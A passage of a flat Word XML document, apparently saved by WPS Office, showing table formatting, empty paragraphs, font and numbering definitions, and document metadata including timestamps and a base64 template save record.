              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF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1"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>　</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69E6F1B5"/>
    <w:p w14:paraId="7720C956">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="77B0C1FB"/>
    <w:p w14:paraId="275E0326"/>
    <w:p w14:paraId="425A2AEB"/>
    <w:p w14:paraId="362CDBB7"/>
    <w:p w14:paraId="6A5CBFB8"/>
    <w:p w14:paraId="0EDEE3F7"/>
    <w:p w14:paraId="588B7A35"/>
    <w:p w14:paraId="5EB8F805"/>
    <w:p w14:paraId="0403B05C"/>
    <w:p w14:paraId="403CB37E"/>
    <w:p w14:paraId="4621398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微软雅黑">
    <w:altName w:val="方正雅意黑 GB18030L2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E8BF4E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F3E8BF4E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="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AB7605"/>
    <w:rsid w:val="0AAB7605"/>
    <w:rsid w:val="79FF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Bullet"/>
    <w:basedOn w:val="1"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2026-10-10T00:44:00Z</dcterms:created>
  <dc:creator>.</dc:creator>
  <cp:lastModifiedBy>龘䶛䨻㸞蚮䡶䴞䴝䯬䬛䰕㹚</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-10T22:08:52Z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5DE74419A4732D27F446CA6A88B30BB7_43</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiZjhmZjcxMGMxZWQwN2QxYzk0NDFjNDJhY2Q1MDE2YzQiLCJ1c2VySWQiOiI5NTE2NTE5NjkifQ==</vt:lpwstr>
  </property>
</Properties>
</file>